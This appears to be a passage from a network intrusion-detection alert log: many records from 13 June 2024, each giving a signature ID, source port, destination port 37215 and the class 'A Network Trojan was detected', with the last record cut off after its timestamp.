              Timestamp:06/13/24-21:33:07.042919
              SID:2835222
              Source Port:35172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356354
              SID:2835222
              Source Port:45038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124038
              SID:2829579
              Source Port:46598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096958
              SID:2835222
              Source Port:50010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302253
              SID:2835222
              Source Port:59410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077695
              SID:2829579
              Source Port:38110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347080
              SID:2835222
              Source Port:41464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972521
              SID:2835222
              Source Port:34648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729470
              SID:2829579
              Source Port:38654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991541
              SID:2829579
              Source Port:37728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016997
              SID:2829579
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129013
              SID:2835222
              Source Port:52126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077597
              SID:2835222
              Source Port:40556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978438
              SID:2829579
              Source Port:48666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942733
              SID:2835222
              Source Port:41538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091961
              SID:2829579
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043211
              SID:2829579
              Source Port:49318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508180
              SID:2835222
              Source Port:40926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174951
              SID:2829579
              Source Port:58874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128755
              SID:2829579
              Source Port:38586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040220
              SID:2835222
              Source Port:58006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211275
              SID:2829579
              Source Port:56788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476922
              SID:2829579
              Source Port:48782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405803
              SID:2829579
              Source Port:53092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546832
              SID:2829579
              Source Port:37350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823944
              SID:2829579
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300332
              SID:2829579
              Source Port:49148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304429
              SID:2835222
              Source Port:56184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824945
              SID:2835222
              Source Port:41560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990431
              SID:2835222
              Source Port:42856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632638
              SID:2829579
              Source Port:59200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229929
              SID:2829579
              Source Port:51534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130319
              SID:2835222
              Source Port:52586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671092
              SID:2835222
              Source Port:45058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990212
              SID:2835222
              Source Port:45064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089937
              SID:2829579
              Source Port:49930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127573
              SID:2835222
              Source Port:46654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177495
              SID:2829579
              Source Port:49528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695723
              SID:2835222
              Source Port:39954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272579
              SID:2835222
              Source Port:56198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730698
              SID:2829579
              Source Port:45716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508130
              SID:2829579
              Source Port:35252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129889
              SID:2835222
              Source Port:54090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654679
              SID:2835222
              Source Port:53218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090158
              SID:2835222
              Source Port:38290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750702
              SID:2829579
              Source Port:43430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356871
              SID:2835222
              Source Port:48960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781194
              SID:2829579
              Source Port:50342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074782
              SID:2835222
              Source Port:36796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424627
              SID:2835222
              Source Port:37042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132036
              SID:2835222
              Source Port:49366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943211
              SID:2829579
              Source Port:40786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677265
              SID:2829579
              Source Port:54814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486925
              SID:2829579
              Source Port:35602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.241661
              SID:2829579
              Source Port:37850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842709
              SID:2835222
              Source Port:36736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137179
              SID:2835222
              Source Port:46776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095429
              SID:2829579
              Source Port:44998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306960
              SID:2829579
              Source Port:52096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486244
              SID:2835222
              Source Port:36716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613850
              SID:2835222
              Source Port:43726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256131
              SID:2835222
              Source Port:37188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240460
              SID:2829579
              Source Port:46600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231862
              SID:2829579
              Source Port:55236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309899
              SID:2829579
              Source Port:36166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376980
              SID:2829579
              Source Port:54976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191476
              SID:2829579
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836763
              SID:2835222
              Source Port:39404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756744
              SID:2835222
              Source Port:49656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419327
              SID:2835222
              Source Port:60658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254497
              SID:2835222
              Source Port:51682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200030
              SID:2829579
              Source Port:48302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098425
              SID:2829579
              Source Port:42048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229883
              SID:2829579
              Source Port:54124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222017
              SID:2835222
              Source Port:53282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359790
              SID:2829579
              Source Port:40578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060846
              SID:2829579
              Source Port:51774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247603
              SID:2829579
              Source Port:41948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654484
              SID:2829579
              Source Port:50194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754229
              SID:2835222
              Source Port:57694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943579
              SID:2835222
              Source Port:43222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176266
              SID:2835222
              Source Port:44300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358306
              SID:2835222
              Source Port:33886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420708
              SID:2835222
              Source Port:34894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869904
              SID:2829579
              Source Port:35622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169110
              SID:2829579
              Source Port:35736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422110
              SID:2835222
              Source Port:40236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751998
              SID:2835222
              Source Port:37178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266521
              SID:2829579
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277976
              SID:2829579
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870030
              SID:2835222
              Source Port:41310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011500
              SID:2829579
              Source Port:39694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506616
              SID:2835222
              Source Port:36500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043325
              SID:2829579
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678281
              SID:2835222
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172990
              SID:2835222
              Source Port:39496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633263
              SID:2829579
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439908
              SID:2835222
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660251
              SID:2835222
              Source Port:53826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028153
              SID:2829579
              Source Port:36032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638689
              SID:2829579
              Source Port:35152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354598
              SID:2829579
              Source Port:37838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677087
              SID:2829579
              Source Port:56290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215676
              SID:2835222
              Source Port:56186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198164
              SID:2829579
              Source Port:53248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402375
              SID:2829579
              Source Port:54066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259115
              SID:2835222
              Source Port:52892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404622
              SID:2829579
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872529
              SID:2829579
              Source Port:47902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729537
              SID:2829579
              Source Port:56328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782702
              SID:2829579
              Source Port:51886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309969
              SID:2835222
              Source Port:46858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725067
              SID:2835222
              Source Port:37068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785659
              SID:2835222
              Source Port:44074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824984
              SID:2829579
              Source Port:52242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971846
              SID:2835222
              Source Port:59838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057433
              SID:2829579
              Source Port:39376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567790
              SID:2829579
              Source Port:33568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214950
              SID:2835222
              Source Port:38170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155239
              SID:2835222
              Source Port:59932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502854
              SID:2835222
              Source Port:51262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631109
              SID:2835222
              Source Port:44914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870073
              SID:2829579
              Source Port:33192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657453
              SID:2835222
              Source Port:54542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992741
              SID:2829579
              Source Port:48200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269479
              SID:2829579
              Source Port:55848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942351
              SID:2829579
              Source Port:44428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660324
              SID:2835222
              Source Port:35898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214348
              SID:2835222
              Source Port:46248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834540
              SID:2829579
              Source Port:41324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977022
              SID:2835222
              Source Port:54076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074239
              SID:2835222
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546795
              SID:2829579
              Source Port:51384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133278
              SID:2829579
              Source Port:42918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885686
              SID:2835222
              Source Port:55954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438859
              SID:2835222
              Source Port:52044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305418
              SID:2829579
              Source Port:59122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838949
              SID:2835222
              Source Port:59164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886210
              SID:2829579
              Source Port:39836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524341
              SID:2835222
              Source Port:48372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554620
              SID:2829579
              Source Port:60258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547389
              SID:2835222
              Source Port:35062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455167
              SID:2829579
              Source Port:41422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417880
              SID:2835222
              Source Port:39518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996608
              SID:2835222
              Source Port:41976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170411
              SID:2829579
              Source Port:46190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171375
              SID:2829579
              Source Port:50694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349980
              SID:2829579
              Source Port:36216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421051
              SID:2835222
              Source Port:44010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994019
              SID:2829579
              Source Port:44282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488995
              SID:2829579
              Source Port:34438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655582
              SID:2829579
              Source Port:39000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011634
              SID:2835222
              Source Port:36638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196832
              SID:2829579
              Source Port:56798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867313
              SID:2829579
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638155
              SID:2829579
              Source Port:60082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277257
              SID:2835222
              Source Port:50774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040291
              SID:2835222
              Source Port:41402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076183
              SID:2829579
              Source Port:38902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504073
              SID:2829579
              Source Port:36640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887955
              SID:2835222
              Source Port:33744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273439
              SID:2835222
              Source Port:53358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726602
              SID:2835222
              Source Port:51568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306007
              SID:2829579
              Source Port:41942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278492
              SID:2829579
              Source Port:38432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012842
              SID:2835222
              Source Port:48866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419873
              SID:2835222
              Source Port:56412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711718
              SID:2829579
              Source Port:48396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306603
              SID:2835222
              Source Port:35900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078397
              SID:2835222
              Source Port:44848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.806008
              SID:2829579
              Source Port:46564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510217
              SID:2829579
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155989
              SID:2829579
              Source Port:41940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607394
              SID:2829579
              Source Port:40354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993405
              SID:2835222
              Source Port:36262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.125842
              SID:2835222
              Source Port:46734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800691
              SID:2829579
              Source Port:38480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272957
              SID:2835222
              Source Port:37338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554015
              SID:2835222
              Source Port:53834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127706
              SID:2835222
              Source Port:50470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654216
              SID:2829579
              Source Port:51518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678109
              SID:2829579
              Source Port:40484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300777
              SID:2835222
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042252
              SID:2829579
              Source Port:56674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056508
              SID:2835222
              Source Port:57018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160081
              SID:2829579
              Source Port:51744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259041
              SID:2829579
              Source Port:60522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044542
              SID:2829579
              Source Port:40124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677391
              SID:2835222
              Source Port:54460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168126
              SID:2835222
              Source Port:54958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092220
              SID:2829579
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725613
              SID:2835222
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545336
              SID:2835222
              Source Port:59826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524286
              SID:2829579
              Source Port:60376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977517
              SID:2829579
              Source Port:46152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526256
              SID:2835222
              Source Port:34100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678340
              SID:2835222
              Source Port:43792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128296
